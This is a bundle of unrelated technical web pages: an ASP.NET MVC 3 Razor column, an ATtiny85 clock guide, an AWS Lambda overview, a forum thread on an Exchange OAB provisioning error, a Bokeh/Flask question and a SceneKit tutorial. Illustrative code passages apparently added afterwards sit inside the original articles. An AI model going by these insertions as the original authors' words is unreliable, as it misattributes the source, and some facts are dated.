Ask Kathleen

This month's Ask Kathleen column answers your questions about the new Razor view engine in Microsoft's Model-View-Controller framework. Part 1 of 2.

Q: What's new in ASP.NET MVC 3?

A: Microsoft released the latest version of its Model-View-Controller (MVC) framework in January. The source code for the Web application framework, which is based on ASP.NET and the Microsoft .NET Framework 4, is available under the Microsoft Public License (Ms-PL). ASP.NET MVC 3 offers significant improvements in three key areas: view creation, client-side support and extensibility. Extensibility deserves a column of its own, so I'll focus on the other features in this month's column. ASP.NET MVC 3 can be installed side-by-side with ASP.NET MVC 2.

The MVC view you create inside Visual Studio 2010 (earlier versions are not supported) is a template that's executed by a view engine to create .NET Framework-based code. This code is later run by your server to produce HTML output (see Figure 1). Previous versions of ASP.NET MVC offered a single view engine supporting ASP.NET WebForms-style syntax. It isn't ASP.NET WebForms, but it uses the same delimiters and syntax, making initial immersion into writing MVC views easy. The framework also allowed alternate view engines, and several were created within the community.

New View Engine

With ASP.NET MVC 3, Microsoft offers a new view engine called Razor that supports a unique templating language. ASP.NET MVC 3 also introduces the ability to simultaneously run multiple view engines in a single project (Web site). Running multiple view engines is important if you want to run existing ASP.NET WebForms-style views alongside Razor views. Razor views use the new Razor templating language. The core requirement of a templating language is to isolate literal content from expressions that return output and template logic.
Most templating languages do this with an open and close construct surrounding either the literal content or -- more commonly -- the expressions and code logic. But Razor is not a general-purpose templating language -- it expects C# or Visual Basic syntax for expressions and code logic embedded within HTML. Because it assumes this language context, it can infer intent, use a single opening delimiter (the @ sign) and, in many cases, recognize the block close and return to literal output. When Razor can't infer intent, you can explicitly open and close template logic with curly brackets and expressions with parentheses in C# Razor templates. This results in clean syntax.

The opening of the default Index.cshtml from the MVC 3 Web application project (with Razor selected as the view engine) illustrates the two most important constructs:

@{ ViewBag.Title = "Home Page"; }
<h2>@ViewBag.Message</h2>

The first @ indicates a Razor code block. The curly brackets are required so that Razor can distinguish between setting the title of the ViewBag and outputting the title followed by the literal text = "Home Page". The expression that outputs the message doesn't require a closing delimiter because Razor recognizes the < as a return to HTML. Within the code block, all C# rules apply, including the semicolon line delimiter. When the @ sign is followed by a keyword, the curly brackets aren't needed and Razor is able to determine what code to execute, and what to output as literals:

@foreach (var item in Model) {
    <tr><td>@item.CustomerNumber</td><td>@item.Name</td></tr>
}

The Visual Basic version of the default Index template shows the same expression syntax, but more verbose logic delimiters:

@Code
    ViewData("Title") = "Home Page"
End Code
<h2>@ViewData("Message")</h2>

In all cases, Visual Studio helps by highlighting the Razor delimiters in bright yellow and the Razor code with a pale blue background (with standard Visual Studio colors) so you can tell what will be executed and what will output as literals.
Sometimes, Razor's inference may not match your intent for a complex expression. When this occurs, simply surround your expression with parentheses in either C# or Visual Basic. The first line below outputs "2 + 2" and the second outputs "4":

@{ var x = 2; }
<p>@x + 2</p>
<p>@(x + 2)</p>

Razor adds a ToString call to any non-string output. Explicit parentheses are also useful when you need to define the end of your expression, such as when Razor would otherwise consider trailing text (a .jpg file extension, for example) part of the expression. You can also use explicit syntax to include C# generics; Razor will otherwise interpret the < as a tag element opening.

Occasionally Razor may interpret content as code. This happens if the content doesn't start with an HTML tag and lies within a code block. You can explicitly switch from code to markup with the @: character sequence:

@foreach (var item in Model) {
    @: Item name: @item.FirstName
}

If you need to include comments or comment out code, you can use the @* ... *@ syntax:

@* comment *@

One of the best Razor features is one you may not notice. The team did a great job of determining whether you're working in code or HTML and offering the appropriate context-based IntelliSense.

The Visual Basic and C# templates illustrate two different approaches to ViewData that work in both languages. ViewBag is new and is simply a version of ViewData that's of dynamic type. Simultaneous use of the two styles won't confuse MVC, though I doubt your teammates would appreciate it. ViewBag allows the simpler, non-quoted syntax, although neither version has any type safety or IntelliSense. While Razor is not a general-purpose generation language, you can use it outside of MVC; you can find a good explanation of this usage on Rick Strahl's blog. If your templates are known at compile time, preprocessed text templates are probably easier to use.

Your Razor view is derived from the generic System.Web.Mvc.WebViewPage class; however, you don't need to specify this explicitly in your view.
If you specify nothing, your view will derive from the dynamic version of the base class. More often, you'll use the @model directive to indicate the type of your model, which may be either a type for simple data or one of the IEnumerable types for list data:

@model IEnumerable<CustomerModel>

The Razor engine supports layouts. Layouts serve the same purpose as master pages, offering consistent elements and page structure. Layouts can be nested and you can explicitly specify them in the view. You can also define initializing behavior for all the views in your site through _ViewStart.cshtml. Defining the layout in this file applies it across all pages of your project. If some pages need a different layout, you can set it explicitly in the page to override the _ViewStart.cshtml behavior. If you need to skip the layout on a page, simply set the Layout property to null. While the most likely use of _ViewStart will be setting layouts, it can contain any initialization code you want run for all your pages.

Layouts are merged into your page, so the resulting HTML displays no artifacts of this creation detail. Within the layout you specify the location of content with the @RenderBody directive. If you'd like to insert different portions of your content in different places, you can insert the @RenderSection directive in your layout, passing the section name. Within your view you define sections with the @section directive:

@section Summary {
    @Html.DisplayFor(model => model.FullName)
    @* additional content *@
}

This combination of features allows complex layouts that are easy to create and maintain.

Controllers have a couple of improvements in ASP.NET MVC 3. You can apply global action filters, which are especially convenient for error and logging filters. Controllers return action results, and MVC 3 supplies two new ones: HttpNotFoundResult and HttpStatusCodeResult. Also, RedirectResult has a Permanent property and the default controller has a new RedirectPermanent method.
The permanent redirect issues a 301 redirect, rather than the non-permanent 302 redirect. Asynchronous JavaScript and XML (AJAX) improvements include automatic model binding to JavaScript Object Notation (JSON) data. This allows incoming JSON parameters to be filled behind the scenes by the default model binder. MVC already had a JSON result to manage outgoing JSON data. Controllers now support output caching of child actions. Child actions allow you to compose action output from several potentially reusable components. Caching at this granular level can significantly reduce the server load and improve performance in some pages. The .NET Framework 4 data annotations namespace got a boatload of new data annotation attributes. ASP.NET MVC 3 leverages these attributes, allowing richer declarative validation. These new attributes include DisplayAttribute, UIHintAttribute and EditableAttribute. The default model metadata provider, DataAnnotationsModelMetadataProvider, uses these attributes in creating model metadata, which can be used to make decisions in views and for server-side and client-side validation. Web development is moving toward the declarative style of HTML5. Instead of requiring JavaScript code in the page to provide the client-side experience, HTML5 offers a standard set of attributes to declare the intended behavior and allow common code libraries to do the real work. This approach of avoiding code in the page is called unobtrusive JavaScript and is supported by MVC 3. Unobtrusive JavaScript makes cleaner, smaller HTML. But the real benefit is the declarative approach that removes library dependencies from your HTML. This allows you to switch JavaScript libraries in the future with relative ease. The current hot JavaScript library is jQuery. Microsoft adds jQuery validation in ASP.NET MVC 3. The company is contributing to the jQuery library and two significant future plug-ins: one for templating and one for localization.
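To make the unobtrusive approach concrete, here's an illustrative fragment (the field name and message text are my assumptions, not from the column) of the kind of markup the MVC 3 helpers emit for a [Required] property when unobtrusive client validation is enabled; jquery.validate.unobtrusive.js reads these data-* attributes at runtime instead of relying on inline script:

```html
<!-- Illustrative output of Html.TextBoxFor / Html.ValidationMessageFor
     for a hypothetical required "Name" property -->
<input type="text" name="Name" id="Name"
       data-val="true"
       data-val-required="The Name field is required." />
<span class="field-validation-valid"
      data-valmsg-for="Name" data-valmsg-replace="true"></span>
```

Because the behavior lives entirely in the attributes, swapping the validation library later means changing the script reference, not the markup.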
https://visualstudiomagazine.com/articles/2011/03/01/delve-into-aspnet-mvc-3.aspx
1.Preparing to use the device with the "built-in" ATtiny85

If you have the device with the micro already installed and want to use it with our project, you will need the following:

-Download the Arduino IDE: download the desired version, and then make an initial configuration.

-Libraries and boards: open the downloaded program and a window will open with a blank project. Select the Preferences option in the File menu. Once the window is open, enter the following URL: If you already have a URL entered, it is not necessary to delete it; simply add the new one below it. Click OK on all windows to save the changes.

Then go to Tools > Board > Boards Manager. When the Boards Manager opens, search for ATTinyCore and install it to get support for our ATtiny85. Once this is done, we will have support to program the microcontroller integrated into the board.

Now install the NeoPixel library to be able to use the LEDs easily. This is done from Sketch > Include Library > Manage Libraries. Search for NeoPixel and install the library as shown below. You will also need to install the RTClib library to support the real-time clock that the board has integrated. Once this is done, we are ready to start programming our board.

The good thing about the Arduino IDE is that there are many libraries available to execute functions or integrate peripherals in a very simple way. You can install as many as you need, since they are installed on the PC; but when integrating them into the project you must be careful, since they consume resources of the microcontroller and you can easily run out of space.

2.Create a program, compile it and upload it to the microcontroller to run it.

To create an Arduino program, we must first include the libraries that we downloaded. For that, you can copy the following text at the beginning of the sketch without deleting anything.
#include <Adafruit_NeoPixel.h>
#include <RTClib.h>

#define NUM_LEDS 54
#define BUTTON 4

RTC_DS3231 rtc;
Adafruit_NeoPixel strip = Adafruit_NeoPixel(NUM_LEDS, 1, NEO_GRB + NEO_KHZ800);

Now you are ready to write your programs and make use of all the functions. To program the ATtiny85 microcontroller, you can follow this tutorial to use an Arduino Uno as a programmer.

To use as a display from another microcontroller: you can use the display from any microcontroller for your project by soldering the pin corresponding to the NeoPixel data line to the "Display" pad. You can also take the input of the button present on the board by soldering to the button pin. You can find examples of how to use the display and more information in the code examples.

User manual for the watch function. Fig1. Fig2.

-To turn on the board, simply connect the USB cable to the micro USB port of the board and the other end to any available USB port.

-You will be shown the welcome message, and then the last time set will be shown with the default color and brightness, or with those saved by the user in the last configuration.

-To place the board in a vertical position, remove the stand as indicated in Fig1. Then, with the USB cable connected, slide the notch of the stand from the bottom up as indicated in Fig2.

-To adjust the time, simply press the OPTIONS/ENTER button at the top of the board as shown in...Read more »
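Tying the declarations from section 2 together, here is a hedged sketch (not the project's actual firmware) of a minimal setup()/loop() skeleton; the brightness value and the time-to-LED mapping are illustrative placeholders:

```cpp
// Illustrative Arduino skeleton using the objects declared in section 2.
void setup() {
    strip.begin();            // initialize the NeoPixel strip
    strip.setBrightness(40);  // illustrative brightness (0-255)
    strip.show();             // push the cleared buffer: all LEDs off
    rtc.begin();              // start the DS3231 real-time clock
    pinMode(BUTTON, INPUT_PULLUP);
}

void loop() {
    DateTime now = rtc.now();  // read the current time from the RTC
    // ... map now.hour() / now.minute() onto the NUM_LEDS pixels here ...
    strip.show();
    delay(1000);
}
```

strip.begin/setBrightness/show and rtc.begin/now are the standard Adafruit_NeoPixel and RTClib calls; everything else here is a placeholder for the clock logic.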
https://hackaday.io/project/181749-business-card-size-4-digits-clock
This is referred to as Serverless Computing or NoOps. AWS provisions, scales, and manages the servers needed to run your code, referred to as the Lambda function. You pay only for the actual time your Lambda function runs. You are charged in 0.1 second increments multiplied by the number of Lambda function invocations. You are only required to specify the amount of computing memory (the default is 128MB); CPU is allocated in proportion to the requested memory.

You write code as Lambda functions. They can respond to changes (events) in other AWS services (sources of events), such as an S3 update or HTTP requests, and interact with external resources like Amazon DynamoDB or other web services.

Notes: Requesting 256MB of memory for your Lambda function allocates approximately twice as much computing power as the default 128MB of memory.

1.2 Supported Languages

As of 2017, Lambda gives you a choice of Node.js (JavaScript), Python 2.7, Java 8 and C#. Lambda provides the Amazon Linux build of openjdk 1.8, and C# is distributed as a NuGet package with the "dotnetcore1.0" runtime parameter. Lambda functions can use dependent libraries, including native ones. There is no whitelist of APIs. Your code can spawn additional threads, if needed.

Notes: According to Lambda documentation, "There are a few activities that are disabled: Inbound network connections are blocked by AWS Lambda, and for outbound connections only TCP/IP sockets are supported, and ptrace (debugging) system calls are restricted. TCP port 25 traffic is also restricted as an anti-spam measure."

1.3 Getting Your Code Up And Running in Lambda

You have three options:

- Create your Lambda function code inside the AWS Management Console (the in-line option) ✔ Only available for Node.js and Python runtimes
- Develop code locally, build a ZIP or JAR bundle with all the dependencies and upload it to AWS
- Upload your ZIP or JAR to S3

Notes: According to Lambda documentation, "Uploads must be no larger than 50MB (compressed).
You can use the AWS Eclipse plugin to author and deploy Lambda functions in Java. You can use the Visual Studio plugin to author and deploy Lambda functions in C# and Node.js. … You can define Environment Variables as key-value pairs that are accessible from your function code. These are useful to store configuration settings without the need to change function code. Learn more. For storing sensitive information, we recommend encrypting values using KMS and the console's encryption helpers."

1.4 Examples of the Base Lambda Function

1.5 Use Cases

Some of the use cases are: high-throughput real-time workflows handling billions of events per day, back-ends for your apps, media object transcoding, real-time tracking of calls made to any Amazon Web Service from your app, and front-end HTTP services. You can invoke your Lambda function via an HTTP endpoint using Amazon API Gateway.

1.6 How It Works

AWS Lambda functions run inside a default AWS-managed VPC on the computing infrastructure provided by AWS. Optionally, you can configure Lambda to run within your custom VPC. It is highly recommended you write your code in a "stateless" style. Any state you may want to retain beyond the lifetime of the request should be externalized to an AWS persistent store, e.g. Amazon S3, Amazon DynamoDB, etc. You can configure triggers for the Lambda, such as uploading a file to S3, that will cause the Lambda to be executed. You can also invoke Lambda functions directly using the AWS SDKs or AWS Mobile SDKs, such as the AWS Mobile SDK for Android. Lambda provides a great foundation for building microservices.

Notes: According to Lambda documentation, "To improve performance, AWS Lambda may choose to retain an instance of your function and reuse it to serve a subsequent request, rather than creating a new copy.
Your code should not assume that this will always happen."

1.7 Example: Processing S3 Source Events with Lambda

Source: AWS Documentation

1.8 The Programming Model

The following core concepts apply to Lambda functions created in any of the supported languages:

◊ Handler – The user callback function invoked by AWS Lambda in response to a registered event; this function is passed the event object and the context object
◊ The context object – The AWS Lambda object that provides information about the call context
◊ Logging – Any user Lambda function can contain language-specific logging statements, the output of which AWS redirects to CloudWatch Logs

Notes: According to Lambda documentation: "AWS Lambda provides this information via the context object."

1.9 Configuring Lambda Functions

The Lambda Dashboard of the AWS Management Console offers you a wizard-like Lambda function creation flow, where you need to: specify the source of events to which your Lambda function will be triggered to respond; provide the function body written in the language of your choice (write code in-line or upload the ZIP file containing your code); specify the role under which your code will be running; and, optionally, provide the memory size (the default is 128 MB), the call timeout (a value between the default 3 seconds and the maximum of 5 minutes), and configuration key-value pairs.
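The handler/context/logging model described in section 1.8 can be sketched in Python, one of the supported runtimes. This is an illustrative sketch, not code from the course material: the function name, event fields, and return shape are my assumptions.

```python
import logging

# Module-level setup runs once per container and may be reused across
# invocations (see the note above on Lambda retaining function instances).
logger = logging.getLogger()
logger.setLevel(logging.INFO)

def handler(event, context):
    """User callback: Lambda passes in the event object and the context object."""
    # Anything logged here is redirected by Lambda to CloudWatch Logs.
    logger.info("received event: %s", event)
    # Illustrative event field; real events depend on the configured source.
    name = event.get("name", "world")
    # The real context object exposes e.g. context.aws_request_id and
    # context.get_remaining_time_in_millis(); None suffices for local tests.
    return {"message": "Hello, " + name}
```

Locally you can exercise the handler by calling it with a dict and a dummy context, which is also how the console's in-line test events behave conceptually.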
1.10 Configure Triggers Page

1.11 Lambda Function Blueprints

You have an option to either create a Lambda function from scratch, or use Lambda blueprints. A Lambda blueprint is a sample configuration of an event source and a skeletal Lambda function for handling such events. As of 2017, Lambda offers 78 blueprints, such as:

◊ dynamodb-process-stream – "An Amazon DynamoDB trigger that logs the updates made to a table"
◊ lex-book-trip-python – "Book details of a visit, using Amazon Lex to perform natural language understanding"
◊ microservice-http-endpoint – "A simple backend (read/write to DynamoDB) with a RESTful API endpoint using Amazon API Gateway"

1.12 How Do I Troubleshoot and Monitor My Lambda Functions?

AWS Lambda automatically monitors your Lambda functions, reporting the following real-time metrics through Amazon CloudWatch:

◊ Invocation count
◊ Invocation duration
◊ Invocation errors

You can use these metrics to set CloudWatch custom alarms. The CloudWatch Logs group associated with your Lambda function can be accessed by this logical path: /aws/lambda/<your function name>

1.13 Developing Lambda in Java

You can create a Lambda in a plain Maven project or use the AWS Toolkit plugin for Eclipse. If you are using Maven, add a dependency on com.amazonaws:aws-lambda-java-core. Develop POJO classes that will carry request and response data. Then develop the Lambda class, which must implement the RequestHandler interface:

public class MyLambda implements RequestHandler<MyRequest, MyResponse> {
    public MyResponse handleRequest(MyRequest request, Context context) {
        // ...
    }
}

Build a JAR file that includes all the dependency classes and upload it for your Lambda.

1.14 Summary

In this article, we reviewed the AWS Lambda service, which provides an excellent platform for building microservices in the Amazon Cloud.
https://www.webagesolutions.com/blog/aws-lambda
derelict-mpg123 0.1.2 A dynamic binding to libmpg123 To use this package, run the following command in your project's root directory: Manual usage Put the following dependency into your project's dependences section: DerelictMPG123 Dynamic binding to libmpg123 library (mp3 decoder) for D language libmpg123 is free software licensed under LGPL 2.1. Project page: Docs: Usage of binding: import derelict.mpg123; DerelictMPG123.load(); // now you can use mpg123 methods - Registered by Vadim Lopatin - 0.1.2 released 5 years ago - buggins/DerelictMPG123 - github.com/buggins/DerelictMPG123 - Boost - Authors: - - Dependencies: - derelict-util - Versions: - Show all 4 versions - Download Stats: 0 downloads today 0 downloads this week 2 downloads this month 117 downloads total - Score: - 0.5 - Short URL: - derelict-mpg123.dub.pm
https://code.dlang.org/packages/derelict-mpg123
A wrapper around the VMD code that implements the VideoDecoder API. More... #include <coktel_decoder.h> List of all members. A wrapper around the VMD code that implements the VideoDecoder API. Definition at line 576 of file coktel_decoder.h. Audio::Mixer::kPlainSoundType [virtual] Close the active video stream and free any associated resources. All subclasses that need to close their own resources should still call the base class' close() function at the start of their function. Reimplemented from Video::VideoDecoder. Load a video from a generic read stream. The ownership of the stream object transfers to this VideoDecoder instance, which is hence also responsible for eventually deleting it. Implementations of this function are required to call addTrack() for each track in the video upon success. Implements Video::VideoDecoder. [private] Definition at line 620 of file coktel_decoder.h. Definition at line 618 of file coktel_decoder.h. Definition at line 619 of file coktel_decoder.h.
https://doxygen.residualvm.org/d6/d8e/classVideo_1_1AdvancedVMDDecoder.html
Nov 26, 2008 04:04 PM|donb|LINK

So I have built HMC 4.5 pretty much per the walk-through. I'm having trouble with W08-DWHE.97, here's the output:

<response>
  <errorContext description="The server 'EXCASOAB01' is not configured with a distribution point." code="0x80004005" executeSeqNo="111">
    <errorSource namespace="Error Provider" procedure="SetError"/>
    <errorSource namespace="Managed Email 2007" procedure="AddOABCAS"/>
  </errorContext>
</response>

If I do a Get-OabVirtualDirectory in the Exchange mgt shell from MPS01 I get this:

[PS] >Get-OabVirtualDirectory
Get-OabVirtualDirectory : Unable to create Internet Information Services (IIS) directory entry. Error message is: Access is denied. . HResult = -2147024891.
At line:1 char:23
+ Get-OabVirtualDirectory <<<<

On EXCASOAB01 I get this:

[PS] >Get-OabVirtualDirectory
Server       Name                  Internal Url    External Url
------       ----                  ------------    ------------
EXCAS01      OAB (Default Web......
EXCASOAB01   OAB (OABDistribu.........

What should I do next - what do I need to be looking at?

Nov 26, 2008 11:36 PM|PowerK6|LINK

Hi donb,

As the help file says, you might receive an error even if you have followed the procedures correctly:

Note: If you run into an error message indicating that EXCASOAB01 is not configured with a distribution point, use the Exchange Management Console to change the internal URL of the OAB distribution to a non-existing URL (for example,), and make a copy of the original URL. Then, repeat the above procedure to add EXCASOAB01 into the default OAB CAS pool. After the addition is complete, change the internal URL of the OAB distribution back to the original.

Or you can use PowerShell (Exchange Management Shell) to change it:

$oabUrl = Get-OABVirtualDirectory
echo $oabUrl.InternalUrl
Get-OabVirtualDirectory | Set-OabVirtualDirectory -InternalUrl <New non-existing OAB URL>

Go back to the Command window and run the provtest AddOABCAS.xml x2 again. Should work this time.
Then set it back to original: Get-OabVirtualDirectory | Set-OabVirtualDirectory -InternalUrl $oabUrl.InternalUrl -Randy All-Star 44551 Points MVP Dec 04, 2008 04:49 AM|TATWORTH|LINK >Excellent advice As your question appears to have been answered, please click the "Mark as answered" against one or more of the replies (even your own if relevant). Dec 04, 2008 06:57 PM|harv|LINK I still get the error even after changing the internal URL to something else. Only difference that i have is my server is named excas0ab1 rather than excas0ab01. Any help is greatly appreciated The account i am using can read the information from AD correctly. Dec 04, 2008 07:02 PM|harv|LINK Server name is EXCASOAB1 rather than EXCASOAB01 as mentioned in HMC help file not sure if that is causing the issue rest all the steps have been completed successfully. After increasing logging i see following info in event viewer Event Type: Information Event Source: Exchange 2007 Provider Event Category: None Event ID: 0 Date: 12/4/2008 Time: 3:54:43 PM User: N/A Computer: MPS01 Description: Procedure='GetOABVDir' <executeXml><context><securityContext trustee="HM-EMC\administrator" impersonate="0" /><transactionContext transactionId="{56066DFA-62CB-4C38-9792-B0A4A70BF351}" /><executeContext procedure="GetOABVDir" procedureExecId="92" providerSource="Microsoft.Provisioning.Providers.Exchange2007Provider.Provider" namespace="Exchange 2007 Provider" type="read" /></context><executeData><oabVDirs /></executeData></executeXml> None 0 Points None 0 Points May 11, 2009 02:45 PM|MattGahan3|LINK Add my woes to this growing list. Exactly the same error; <response><errorContext description="The server 'EXCAS' is not configured with a distribution point." 
code="0x80004005" executeSeqNo="99"><errorSource namespace ="Error Provider" procedure="SetError"/><errorSource namespace="Managed Email 20 07" procedure="AddOABCAS"/></errorContext></response> I have set provtest logging to level 5 and its not reporting anything weird. I am using domain/administrator account to exectute the requests and have checked both IIS and the exchange console to ensure i have followed the procedure. I can login to the website virtual directory with my equivalent of the '' url and have tried numerous variations (the use of the term ' non-existing URL' is a little confusing here, is the intention to deliberately set a domain that can't be found or one that can?... i tried both, same result. The distribution point is most definately there, website configured, external certificate installed. Additionaly i have rebooted the AD's and the servers in sequence, flushed dns etc... Now quite desperate as i can't see any way of extracting any more information about what is going wrong here! Any more clues gratefully received .... realy gutting as everything had gone absolutely without a hitch till this point! Kind Regards, Matt Gahan Jun 19, 2009 01:44 AM|Dancrai|LINK Hi, I am new to this forum and to HMC as well. I was would really appreciate any additional information on this issue, because if the listed fix of changing the Internal URL to a non existant URL and re-running the Provtest AddOABCAS.xml /x2 does not fix the issue, then there are no next steps that I can find. I have worked back through the Technet article to confirm all step have been completed correctly. I have tried using both excas01 and excasoab01 as the OAB Web distribution folder, but I get the same error for both. I can see both servers listed correctly if I run a Get-OABVirtualDirectory from the Exchange Management Shell. 
Any more information would be gratefully appreciated Thanks Adrian None 0 Points Jul 01, 2009 05:27 AM|julian.wilkins@grologic.co.uk|LINK I've had the same problem with the provtest addoabcas.xml /x2 command. I'm currently going through the TechNet deployment walkthrough for HMC 4.5, and I'm installing it on Hyper-V using virtual machines. I trawled the internet for ages trying to find a solution, tried the various ones offered but none worked. I also removed the multiple DNS entries that were being created when assigning 2 IPs to the same network card. I eventually gave up, and tried the next stage (provtest addexchangeresources.xml /x2) and that also failed. Exasperated, I gave up, turned off all the virtual servers and went home. Next day, I booted up all the virtual servers in turn (starting with AD01, AD02, MPSSQL01, MPSSQL02, EXMBX01-NODE1, EXMBX01-NODE2, MPSSQL01, MPSSQL02, OMSQL01 and then the rest) and tried the same command again on MPS01, and this time it worked. Note that I did have the internal URL of EXCASOAB01 still set to, although I had tried this the previous day and it didn't work. So, my suggestion is to shut every single server down and then reboot them in sequence. It's one of those "it shouldn't make a difference" but in my case it did. Quite bizarre. I hope this helps other people with this problem. 9 replies Last post Jul 01, 2009 05:27 AM by julian.wilkins@grologic.co.uk
https://forums.asp.net/t/1353585.aspx?Procedure+W08+DWHE+97+provtest+AddOABCAS+xml+fails+miserably
Hi, I have a Bokeh app which I am trying to render through Flask. Bokeh and Flask are installed on an Ubuntu VM (on AWS, just in case that matters). The below code works only if I replace localhost:5006/env with public.ip:5006/env. If I change the url in the below code to localhost:5006/env I get a blank page (at my.public.ip:5000).

from bokeh.resources import CDN
from flask import Flask, render_template
from bokeh.embed import server_document, server_session
from bokeh.client import pull_session

app = Flask(__name__)

@app.route("/")
def index():
    myurl = ""
    bokeh_script = server_document(myurl)
    return render_template("index.html", bokeh_script=bokeh_script)

# run the app
if __name__ == "__main__":
    app.run(host='0.0.0.0')
    # app.run(debug=True)

Any idea why this is happening? What could be the fix for it? I am trying not to hardcode the public IP in my code.
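A likely explanation (my sketch, not from the original post): server_document emits a script tag that the *browser* loads, so "localhost" in that URL refers to the viewer's machine, not the Flask server. One hedged way to avoid hardcoding the public IP is to derive the Bokeh URL from the Host header of the incoming request; the helper below is illustrative, and the path and port match the question's setup:

```python
# Illustrative helper: build the Bokeh server URL from the host the browser
# actually used to reach Flask (flask.request.host, e.g. "203.0.113.7:5000"),
# so the embedded script points at a host the browser can resolve.
def bokeh_server_url(request_host, app_path="/env", bokeh_port=5006):
    hostname = request_host.split(":")[0]              # drop Flask's port
    return "http://%s:%d%s" % (hostname, bokeh_port, app_path)
```

Inside the view you would then call server_document(bokeh_server_url(request.host)). Note that the Bokeh server must also accept that origin, e.g. started with bokeh serve's --allow-websocket-origin option for the host:port the page is served from.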
https://discourse.bokeh.org/t/empty-page-when-flask-configured-to-localhost/6579
So, this is it! Finally, we move from the 2D world to 3D. With SceneKit, we can make 3D games quite easily, especially since the syntax for SceneKit is quite similar to SpriteKit. When we say 3D games, we don't mean that you get to put on your 3D glasses to make the game. In 2D games, we mostly work in the x and y coordinates. In 3D games, we deal with all three axes x, y, and z. Additionally, in 3D games, we have different types of lights that we can use. Also, SceneKit has an inbuilt physics engine that will take care of forces such as gravity and will also aid collision detection. We can also use SpriteKit in SceneKit for GUI and buttons so that we can add scores and interactivity to the game. So, there is a lot to cover in this article. Let's get started. The topics covered in this article by Siddharth Shekar, the author of Learning iOS 8 Game Development Using Swift, are as follows: - Creating a scene with SCNScene - Adding objects to a scene - Importing scenes from external 3D applications - Adding physics to the scene - Adding an enemy (For more resources related to this topic, see here.) Creating a scene with SCNScene First, we create a new SceneKit project. It is very similar to creating other projects. Only this time, make sure you select SceneKit from the Game Technology drop-down list. Don't forget to select Swift for the language field. Choose iPad as the device and click on Next to create the project in the selected directory, as shown in the following screenshot: Once the project is created, open it. Click on the GameViewController class, and delete all the contents in the viewDidLoad function, delete the handleTap function, as we will be creating a separate class, and add touch behavior. Create a new class called GameSCNScene and import the following headers. 
Inherit from the SCNScene class and add an init function that takes in a parameter called view of type SCNView:

import Foundation
import UIKit
import SceneKit

class GameSCNScene: SCNScene {

    let scnView: SCNView!
    let _size: CGSize!
    var scene: SCNScene!

    required init(coder aDecoder: NSCoder) {
        fatalError("init(coder:) has not been implemented")
    }

    init(currentview view: SCNView) {
        super.init()
    }
}

Also, create two new constants, scnView and _size, of type SCNView and CGSize, respectively, and a variable called scene of type SCNScene. Since we are making a SceneKit game, we have to get the current view, which is of type SCNView, similar to how we got the view in SpriteKit, where we typecast the current view to SKView. We create the _size constant to hold the current size of the view. SCNScene is the class used to make scenes in SceneKit, similar to how we would use SKScene to create scenes in SpriteKit. Swift will automatically ask to create the required init function, so we might as well include it in the class. Now, move to the GameViewController class and create a global variable called gameSCNScene of type GameSCNScene and assign it in the viewDidLoad function, as follows:

class GameViewController: UIViewController {

    var gameSCNScene: GameSCNScene!

    override func viewDidLoad() {
        super.viewDidLoad()
        let scnView = view as SCNView
        gameSCNScene = GameSCNScene(currentview: scnView)
    }
} // UIViewController class

Great! Now we can add objects in the GameSCNScene class. It is better to move all the code to a single class so that we can keep the GameViewController class clean.
In the init function of GameSCNScene, add the following after the super.init call:

scnView = view
_size = scnView.bounds.size

// retrieve the SCNView
scene = SCNScene()
scnView.scene = scene
scnView.allowsCameraControl = true
scnView.showsStatistics = true
scnView.backgroundColor = UIColor.yellowColor()

Here, we first assign the current view to the scnView constant. Next, we set the _size constant to the dimensions of the current view. We then initialize the scene variable and assign it to the scene property of scnView. Next, enable allowsCameraControl and showsStatistics. The former will let us control the camera and move it around to have a better look at the scene. With statistics enabled, we will see the performance of the game and can make sure that the FPS is maintained. The backgroundColor property of scnView sets the color of the view; I have set it to yellow so that objects are easily visible in the scene, as shown in the following screenshot. With all this set, we can run the scene. Well, it is not all that awesome yet. One thing to notice is that we have still not added a camera or a light, but we still see the yellow scene. This is because, although we have not added anything to the scene yet, SceneKit automatically provides a default light and camera for the scene.

Adding objects to a scene

Let us next add geometry to the scene. We can create basic geometry such as spheres, boxes, cones, tori, and so on in SceneKit with ease. Let us create a sphere first and add it to the scene.
Adding a sphere to the scene

Create a function called addGeometryNode in the class and add the following code in it:

func addGeometryNode() {
    let sphereGeometry = SCNSphere(radius: 1.0)
    sphereGeometry.firstMaterial?.diffuse.contents = UIColor.orangeColor()

    let sphereNode = SCNNode(geometry: sphereGeometry)
    sphereNode.position = SCNVector3Make(0.0, 0.0, 0.0)
    scene.rootNode.addChildNode(sphereNode)
}

For creating geometry, we use the SCNSphere class to create a sphere shape. We could also call SCNBox, SCNCone, SCNTorus, and so on to create box, cone, or torus shapes, respectively. While creating the sphere, we have to provide the radius as a parameter, which determines the size of the sphere. To place the shape, we have to attach it to a node so that we can position it and add it to the scene. So, create a new constant called sphereNode of type SCNNode and pass in the sphere geometry as a parameter. For positioning the node, we use the SCNVector3Make function to place our object in 3D space by providing the values for x, y, and z. Finally, to add the node to the scene, we call addChildNode on scene.rootNode, unlike SpriteKit, where we would simply call addChild on the scene itself. With the sphere added, let us run the scene. Don't forget to add self.addGeometryNode() in the init function. We did add a sphere, so why are we getting a flat circle (shown in the following screenshot)? Well, the basic light source used by SceneKit just enables us to see objects in the scene. If we want to see the actual sphere, we have to improve the light source of the scene.
Adding light sources

Let us create a new function called addLightSourceNode as follows so that we can add custom lights to our scene:

func addLightSourceNode() {
    let lightNode = SCNNode()
    lightNode.light = SCNLight()
    lightNode.light!.type = SCNLightTypeOmni
    lightNode.position = SCNVector3(x: 10, y: 10, z: 10)
    scene.rootNode.addChildNode(lightNode)

    let ambientLightNode = SCNNode()
    ambientLightNode.light = SCNLight()
    ambientLightNode.light!.type = SCNLightTypeAmbient
    ambientLightNode.light!.color = UIColor.darkGrayColor()
    scene.rootNode.addChildNode(ambientLightNode)
}

We can add some light sources to see some depth in our sphere object. Here we add two types of light source. The first is an omni light. Omni lights start at a point, and the light is scattered equally in all directions. We also add an ambient light source. An ambient light is light that is reflected by other objects, such as moonlight. There are two more types of light source: directional and spotlight. Spotlight is easy to understand, and we usually use it if a certain object needs to be brought to attention, like a singer on a stage. Directional lights are used if you want light to go in a single direction, such as sunlight: the Sun is so far from the Earth that its rays are almost parallel to each other when they reach us. For creating a light source, we create a node called lightNode of type SCNNode. We then assign SCNLight to the light property of lightNode. We assign the omni light type to be the type of the light, set the position of the light source to 10 in all three coordinates (x, y, and z), and add it to the rootNode of the scene. Next we add an ambient light to the scene. The first two steps of the process are the same as for creating any light source:
